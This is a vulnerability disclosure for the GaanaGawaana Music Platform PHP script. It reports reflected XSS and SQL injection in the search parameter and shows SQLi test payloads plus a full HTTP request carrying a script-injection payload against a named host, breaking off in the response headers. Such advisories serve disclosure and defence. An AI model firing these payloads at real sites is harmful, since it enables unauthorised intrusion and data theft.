## Title: GaanaGawaana - Music Platform PHP Script-1.0 XSS-Reflected and SQLi Vulnerability ## Author: nu11secur1ty ## Date: 05.16.2023 ## Vendor: https://www.codester.com/ ## Software: https://www.codester.com/items/27270/gaanagawaana-music-platform-php-script ## Reference XSS: https://portswigger.net/web-security/cross-site-scripting ## Reference SQLi: https://portswigger.net/web-security/sql-injection ## Description: XSS: The value of the q request parameter is copied into the HTML document as text between TITLE tags. The payload aw9rxrg1m6 was submitted in the q parameter. This input was echoed unmodified in the application's response. -------------------------------------------------------------------------------------------------------------------------------- SQLi: The q parameter appears to be vulnerable to SQL injection attacks. The payloads 70346811' or 7218=7218-- and 18028207' or 8587=8593-- were each submitted in the q parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way. STATUS: CRITICAL Vulnerability [+]Exploit-XSS-test: ```XSS GET /search?q=aw9rx%3c%2ftitle%3e%3cscript%3ealert(1)%3c%2fscript%3erg1m6 HTTP/2 Host: gaanagawaana.codesler.com Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36 Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="113", "Chromium";v="113" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 Content-Length: 0 ``` [+]Response-XSS-test: ``` HTTP/2 200 OK Cache-Control: no-store, max-age=0, no-cache Date: Tue, 16 May 2023 06:39:12 GMT Content-Type: text/html; charset=UTF-8 Server: Apache